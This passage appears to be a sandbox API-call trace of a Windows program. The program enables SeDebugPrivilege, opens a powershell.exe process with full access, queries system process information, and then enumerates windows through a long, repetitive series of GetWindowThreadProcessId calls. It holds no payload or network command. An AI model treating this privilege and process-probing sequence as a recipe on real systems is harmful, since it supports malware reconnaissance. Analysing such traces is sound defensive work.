(in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcc7f0 | out: lpLuid=0xcc7f0*(LowPart=0x14, HighPart=0)) returned 1 [0074.689] GetCurrentProcess () returned 0xffffffffffffffff [0074.690] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcc810 | out: TokenHandle=0xcc810*=0x2f0) returned 1 [0074.691] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2d0a9d8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0074.692] CloseHandle (hObject=0x2f0) returned 1 [0074.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x2f0 [0074.723] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2d0aa40, cb=0x200, lpcbNeeded=0xcd828 | out: lphModule=0x2d0aa40, lpcbNeeded=0xcd828) returned 1 [0074.726] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f720000, lpmodinfo=0x2d0acb0, cb=0x18 | out: lpmodinfo=0x2d0acb0*(lpBaseOfDll=0x13f720000, SizeOfImage=0x77000, EntryPoint=0x13f72c63c)) returned 1 [0074.727] CoTaskMemAlloc (cb=0x804) returned 0x1fdb50 [0074.727] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f720000, lpBaseName=0x1fdb50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0074.728] CoTaskMemFree (pv=0x1fdb50) [0074.729] CoTaskMemAlloc (cb=0x804) returned 0x1fdb50 [0074.729] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f720000, lpFilename=0x1fdb50, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0074.729] CoTaskMemFree (pv=0x1fdb50) [0074.730] CloseHandle (hObject=0x2f0) returned 1 [0074.740] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x340) returned 0x2f0 [0074.741] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0xcd958 | out: lpExitCode=0xcd958*=0x103) returned 1 [0074.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d0b088, Length=0x20000, ResultLength=0xcd920 | out: SystemInformation=0x12d0b088, ResultLength=0xcd920*=0x11208) returned 0x0 [0074.769] EnumWindows (lpEnumFunc=0x28366ac, lParam=0x0) returned 1 [0074.771] GetWindowThreadProcessId (in: hWnd=0x400e6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.771] GetWindowThreadProcessId (in: hWnd=0x400ee, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.771] GetWindowThreadProcessId (in: hWnd=0x400c2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.772] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x538 [0074.772] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x514 [0074.772] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.772] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x778 [0074.772] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x778 [0074.772] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.773] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.773] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.773] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.773] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.773] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.773] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.774] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.774] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.774] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x458 [0074.774] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.774] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.774] GetWindowThreadProcessId (in: hWnd=0xa00a6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.774] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9e4 [0074.775] GetWindowThreadProcessId (in: hWnd=0x400ca, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.775] GetWindowThreadProcessId (in: hWnd=0x400ac, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.775] GetWindowThreadProcessId (in: hWnd=0x500d4, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.775] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.775] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.775] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.775] GetWindowThreadProcessId (in: hWnd=0x500b0, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.776] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9d4 [0074.776] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9c4 [0074.776] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9b4 [0074.776] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9a4 [0074.776] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x994 [0074.776] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x984 [0074.776] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x974 [0074.777] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x964 [0074.777] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x954 [0074.777] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x944 [0074.777] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x934 [0074.777] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x924 [0074.777] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x914 [0074.777] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x904 [0074.777] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8f4 [0074.778] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8e4 [0074.778] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8d4 [0074.778] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8c4 [0074.778] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8b4 [0074.778] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8a4 [0074.778] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x894 [0074.778] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x884 [0074.778] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x874 [0074.779] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x864 [0074.779] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x854 [0074.779] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x844 [0074.779] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x834 [0074.780] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x824 [0074.780] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x814 [0074.780] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x804 [0074.780] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x5a8 [0074.780] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x248 [0074.780] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x31c [0074.780] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x40c [0074.781] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x5c4 [0074.781] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x664 [0074.781] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x6c0 [0074.781] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x318 [0074.781] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x308 [0074.781] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x634 [0074.781] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x174 [0074.781] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x60c [0074.782] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x32c [0074.782] GetWindowThreadProcessId (in: hWnd=0x301ae, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x35c [0074.782] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7e0 [0074.782] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x648 [0074.782] GetWindowThreadProcessId (in: hWnd=0x8010e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x408 [0074.782] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7e8 [0074.782] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x790 [0074.782] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7a0 [0074.783] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x2a8 [0074.783] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x23c [0074.783] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x560 [0074.783] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x564 [0074.783] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7a8 [0074.783] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x434 [0074.783] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x71c [0074.783] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x67c [0074.784] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x90 [0074.784] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7b4 [0074.784] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x6fc [0074.784] GetWindowThreadProcessId (in: hWnd=0x40106, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x358 [0074.784] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4f0 [0074.784] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x514 [0074.784] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x50c [0074.784] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x514 [0074.784] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x50c [0074.785] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x514 [0074.785] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4f0 [0074.785] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4f0 [0074.785] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x58c [0074.785] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x578 [0074.785] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x458 [0074.785] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x530 [0074.785] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.785] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x508 [0074.786] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.786] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4f4 [0074.786] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.786] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.786] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x794 [0074.786] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.786] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.787] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x458 [0074.787] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x458 [0074.787] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x448 [0074.787] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x778 [0074.787] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x458 [0074.787] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x538 [0074.787] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.787] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4ac [0074.787] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9e4 [0074.787] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9d4 [0074.788] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9c4 [0074.788] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9b4 [0074.788] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x9a4 [0074.788] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x994 [0074.788] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x984 [0074.788] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x974 [0074.788] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x964 [0074.788] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x954 [0074.788] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x944 [0074.789] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x934 [0074.789] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x924 [0074.789] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x914 [0074.789] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x904 [0074.789] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8f4 [0074.789] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8e4 [0074.789] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8d4 [0074.789] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8c4 [0074.789] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8b4 [0074.790] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x8a4 [0074.790] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x894 [0074.790] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x884 [0074.790] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x874 [0074.790] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x864 [0074.790] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x854 [0074.790] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x844 [0074.790] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x834 [0074.790] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x824 [0074.791] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x814 [0074.791] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x804 [0074.791] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x5a8 [0074.791] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x248 [0074.791] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x31c [0074.791] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x40c [0074.791] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x5c4 [0074.791] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x664 [0074.792] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x6c0 [0074.792] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x318 [0074.792] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x308 [0074.792] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x634 [0074.792] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x174 [0074.792] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x60c [0074.792] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x32c [0074.792] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x35c [0074.793] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7e0 [0074.793] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x648 [0074.793] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x408 [0074.793] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7e8 [0074.793] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x790 [0074.793] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7a0 [0074.793] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x2a8 [0074.793] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x23c [0074.794] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x560 [0074.794] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x564 [0074.794] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7a8 [0074.794] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x434 [0074.794] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x71c [0074.794] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x67c [0074.794] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x90 [0074.794] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x7b4 [0074.795] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x6fc [0074.795] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x358 [0074.795] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x50c [0074.795] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x514 [0074.795] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4f0 [0074.795] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x58c [0074.795] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x458 [0074.796] GetWindowThreadProcessId (in: hWnd=0x10086, 